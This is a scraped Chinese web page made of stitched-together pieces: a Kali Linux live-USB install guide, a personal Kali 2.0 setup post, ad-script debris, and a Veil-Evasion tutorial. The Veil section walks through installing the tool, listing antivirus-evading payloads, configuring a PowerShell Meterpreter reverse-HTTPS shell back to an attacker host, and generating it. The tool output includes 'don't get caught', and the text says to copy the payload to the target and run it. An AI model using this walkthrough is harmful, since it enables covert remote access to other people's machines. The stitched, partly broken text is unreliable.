怎样从U盘安装kali linux 2.0安装qq2.0

用Live U盘安装Kali Linux_Linux教程_Linux公社-Linux系统门户网站
你好,游客
用Live U盘安装Kali Linux
来源:Linux社区&
作者:Linux
从U盘启动然后安装Kali是我们最喜欢并且是运行Kali最快(容易)的方法.为此,我们首先要把Kali的ISO克隆到U盘.如果你经常使用Kali Linux U盘,请在克隆前阅读完整的文档。
Kali Linux安装系列阅读:
用Live U盘安装Kali Linux
硬盘安装Kali Linux&
加密安装Kli Linux&
Kali Linux安装之Kali和Windows双引导&
下载Kali Linux
准备USB镜象
下载Kali linux.
如果你用的是Windows,下载.
*nix类系统不需要额外的软件.
一块U盘(至少 2GB 容量).
Kali Linux Live U盘安装过程
在用Windows的电脑上克隆Kali
插入U盘.运行Win32 Disk Imager.
选择Kali Linux ISO文件作为被克隆的文件,然后核实要克隆的U盘是否正确.
克隆完成后,从Windows机器安全弹出U盘.现在你可以用U盘启动Kali Linux了.
在用Linux的电脑上克隆Kali
在Linux环境下制作可启动的Kali Linux U盘很容易.下载好Kali ISO文件后,你可以用dd把它克隆到U盘:
警告!虽然在U盘上克隆Kali过程很简单,但是如果你不懂你正在用dd做什么,很容易破坏引导分区.
用dmesg确认你的U盘设备块名.
开始克隆Kali ISO文件到U盘(谨慎操作!):
dd if=kali.iso of=/dev/sdb bs=512k
就这样!你现在可以用U盘启动到Kali Live/Installer环境了.
为你的U盘添加Persistence功能
在某些情况下.为你的Kali Linux镜象添加persistence功能(在Live启动的时候可以保存和修改文件)非常有用.为了给你的Kali Linux U盘启动persistent功能,按照以下步骤.本例中,我们假设我们的设备块名是/dev/sdb.如果你想添加persistence功能,需要一块比上面提到的要求更大容量的U盘.
克隆Kali Linux ISO到U盘和上面讲解的一样,用dd在&用Linux的电脑上克隆Kali&.
在U盘创建并格式化额外的分区.本例中我们用gparted
gparted /dev/sdb
现在你的分区方案应该和下图类似:
更多详情见请继续阅读下一页的精彩内容:
相关资讯 & & &
& (09月05日)
& (04月11日)
& (11月16日)
& (08月29日)
& (03月01日)
   同意评论声明
   发表
尊重网上道德,遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任
本站管理人员有权保留或删除其管辖留言中的任意内容
本站有权在网站内转载或引用您的评论
参与本评论即表明您已经阅读并接受上述条款折腾kali linux2.0
偶然的机会了解到了kali linux这个用于渗透测试的linux发行版,于是就从官网下了iso,但是制作启动盘老出错(电脑上已经装了.1、 ubuntu14.04、 centos7)。网上查了下说在linux下用dd命令特别简单,于是转到ubuntu下制作启动盘,不过没用dd, 右键iso文件选择了&使用磁盘映像写入器打开&,启动盘制作成功(里面生成了EFI、install和live三个文件夹)。于是划了50GB的未分区磁盘,准备安装。
安装过程中选择手动分区,/目录和/home分开。
安装好之后引导选项成了这样。(先装的windows,再装的ubuntu,然后装了centos。ubuntu和centos一直都不能引导在一起,网上说ubuntu在centos之后安装就能引导成功,现在装了kali ,四个终于可以和谐相处了。)
安装好了之后添加了源
命令行里 leafpad /etc/apt/sources.list,把下面代码复制到里面
deb http://http.kali.org/kali sana main non-free contrib
deb-src http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/sana/updates main contrib non-free
国内源我选择的是中科大的源:
deb http://mirrors./kali sana main non-free contrib
deb-src http://mirrors./kali sana main non-free contrib
deb http://mirrors./kali-security/sana/updates main contrib non-free
deb-src http://mirrors./kali-security/sana/updates main contrib non-free
源添加好后执行 apt-get update && apt-get dist-upgrade
两个源最好不要同时使用,使用其中一个时,注释掉另一个。
更新完系统后/分区空间不足了,想把/和home合并,没搞好,于是只得重装了一遍。
kali linux默认只有root用户,一般添加一个标准用户(user1替换成自己的用户名)
useradd &m user1
为该用户设置密码
passwd user1
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467142',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'Kali Linux下Veil安装与使用的方法-linux-操作系统-壹聚教程网Kali Linux下Veil安装与使用的方法
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。由Offensive Security Ltd维护和资助,本文为各位介绍Kali Linux下Veil安装与使用的方法,具体细节如下所示。
Veil是一款绕过杀毒软件的payload生成器,今天我将给大家分享如何安装,安装方法有以下几种,
一、通过建立目录 从Git下载源码安装,
sudo apt-get -y install git
git clone htt:///Veil-Framework/Veil-Evasion.git
cd veil-Evasion/
bash setup/setup.sh &s
源码下载完成,切换到Setup目录,运行bash脚本进行安装,所有过程全部默认即可。
二、通过apt-get install 安装root@kali:/# apt-get install veil
正在读取软件包列表& 完成
正在分析软件包的依赖关系树&&&&&&
正在读取状态信息& 完成&&&&&&
下列软件包是自动安装的并且现在不需要了:
& python-bitarray python-bloomfilter
Use &apt-get autoremove& to remove them.
将会安装下列额外的软件包:
& veil-evasion
下列【新】软件包将被安装:
& veil veil-evasion
升级了 0 个软件包,新安装了 2 个软件包,要卸载 0 个软件包,有 43 个软件包未被升级。
需要下载 5,367 kB 的软件包。
解压缩后会消耗掉 16.5 MB 的额外空间。
您希望继续执行吗?[Y/n]y
获取:1 http://mirrors./kali/ kali/main veil-evasion amd64 2.20-0kali1 [5,360 kB]
获取:2 http://mirrors./kali/ kali/main veil amd64 2.20-0kali1 [6,570 B]&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
下载 5,367 kB,耗时 6秒 (782 kB/s)&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Selecting previously uned package veil-evasion.
(正在读取 & 系统当前共安装有 340231 个文件和目录。)
正在解压缩 veil-evasion (从 &/veil-evasion_2.20-0kali1_amd64.deb) &
Selecting previously unselected package veil.
正在解压缩 veil (从 &/veil_2.20-0kali1_amd64.deb) &
正在设置 veil-evasion (2.20-0kali1) &
正在设置 veil (2.20-0kali1) &
三、启动并简单使得切换至安装目录 ,或者任意终端输入veil 即可运行列出所有模块:
[menu&&]: lists
=========================================================================
&Veil-Evasion | [Version]: 2.22.1
=========================================================================
&[Web]: https://www./ | [Twitter]: @VeilFramework
=========================================================================
&[*] Available Payloads:
&1)&auxiliary/coldwar_wrapper
&2)&auxiliary/pyinstaller_wrapper
&3)&c/meterpreter/rev_http&
&4)&c/meterpreter/rev_http_service
&5)&c/meterpreter/rev_tcp&&
&6)&c/meterpreter/rev_tcp_service
&7)&c/shellcode_inject/flatc
&8)&cs/meterpreter/rev_http
&9)&cs/meterpreter/rev_https
&10)&cs/meterpreter/rev_tcp&
&11)&cs/shellcode_inject/base64_substitution
&12)&cs/shellcode_inject/virtual
&13)&go/meterpreter/rev_http
&14)&go/meterpreter/rev_https
&15)&go/meterpreter/rev_tcp&
&16)&go/shellcode_inject/virtual
&17)&native/backdoor_factory
&18)&native/hyperion&&&&&&&&
&19)&native/pe_scrambler&&&&
&20)&powershell/meterpreter/rev_http
&21)&powershell/meterpreter/rev_https
&22)&powershell/meterpreter/rev_tcp
&23)&powershell/shellcode_inject/download_virtual
&24)&powershell/shellcode_inject/psexec_virtual
&25)&powershell/shellcode_inject/virtual
&26)&python/meterpreter/bind_tcp
&27)&python/meterpreter/rev_http
&28)&python/meterpreter/rev_http_contained
&29)&python/meterpreter/rev_https
&30)&python/meterpreter/rev_https_contained
&31)&python/meterpreter/rev_tcp
&32)&python/shellcode_inject/aes_encrypt
&33)&python/shellcode_inject/aes_encrypt_HTTPKEY_Request
&34)&python/shellcode_inject/arc_encrypt
&35)&python/shellcode_inject/base64_substitution
&36)&python/shellcode_inject/des_encrypt
&37)&python/shellcode_inject/download_inject
&38)&python/shellcode_inject/flat
&39)&python/shellcode_inject/letter_substitution
&40)&python/shellcode_inject/pidinject
&41)&ruby/meterpreter/rev_http
&42)&ruby/meterpreter/rev_http_contained
&43)&ruby/meterpreter/rev_https
&44)&ruby/meterpreter/rev_https_contained
&45)&ruby/meterpreter/rev_tcp
&46)&ruby/shellcode_inject/base64
&47)&ruby/shellcode_inject/flat
&[menu&&]:
输入ID选择模块:
[menu&&]: 21
=========================================================================
&Veil-Evasion | [Version]: 2.22.1
=========================================================================
&[Web]: https://www./ | [Twitter]: @VeilFramework
=========================================================================
&Payload: powershell/meterpreter/rev_https loaded
&Required Options:
&Name&&&Current Value&Description
&----&&&-------------&-----------
&LHOST&&&&&&&&&& &&&&&&&& &IP of the Metasploit handler
&LPORT&&&&&&&&&& &8443&&& &Port of the Metasploit handler
&PROXY&&&&&&&&&& &N&&&&&& &Use system proxy settings
&Available Commands:
&set&&&&&&&& &Set a specific option value
&info&&&&&&& &Show information about the payload
&options&&&& &Show payload's options
&generate&&& &Generate payload
&back&&&&&&& &Go to the main menu
&exit&&&&&&& &exit Veil-Evasion
&[powershell/meterpreter/rev_https&&]:
四、生成Payload我们来设定LHOST和LRORT这两个选项,本例子选择本次局域网中的WindowsXp做为靶机,ip:192.168.34.73 本地端口443(伪装为ssl)所以设定如下:
[powershell/meterpreter/rev_https&&]: set LHOST 192.168.34.220
&[i] LHOST =& 192.168.34.220
&[powershell/meterpreter/rev_https&&]: set LPORT 443
&[i] LPORT =& 443
&[powershell/meterpreter/rev_https&&]: generate
=========================================================================
&Veil-Evasion | [Version]: 2.22.1
=========================================================================
&[Web]: https://www./ | [Twitter]: @VeilFramework
=========================================================================
&[&] Please enter the base name for output files (default is 'payload'): kali-key
&Language:&&powershell
&Payload:&&powershell/meterpreter/rev_https
&Required Options:&&&&& LHOST=192.168.34.220& LPORT=443& PROXY=N
&Payload File:&&/usr/share/veil-output/source/kali-key.bat
&Handler File:&&/usr/share/veil-output/handlers/kali-key_handler.rc
&[*] Your payload files have been generated, don't get caught!
&[!] And don't submit samples to any online scanner! 😉
&[&] Press any key to return to the main menu.
=========================================================================
&Veil-Evasion | [Version]: 2.22.1
=========================================================================
&[Web]: https://www./ | [Twitter]: @VeilFramework
=========================================================================
&Main Menu
&47 payloads loaded
&Available Commands:
&use&&&&&&&& &Use a specific payload
&info&&&&&&& &Information on a specific payload
&list&&&&&&& &List available payloads
&update&&&&& &Update Veil-Evasion to the latest version
&clean&&&&&& &Clean out payload folders
&checkvt&&&& &Check payload hashes vs. VirusTotal
&exit&&&&&&& &Exit Veil-Evasion
&[menu&&]:
通过将生成的Payload复制到目标主机上进行运行
上一页: &&&&&下一页:相关内容

我要回帖

更多关于 kali linux 2.0 安装 的文章

 

随机推荐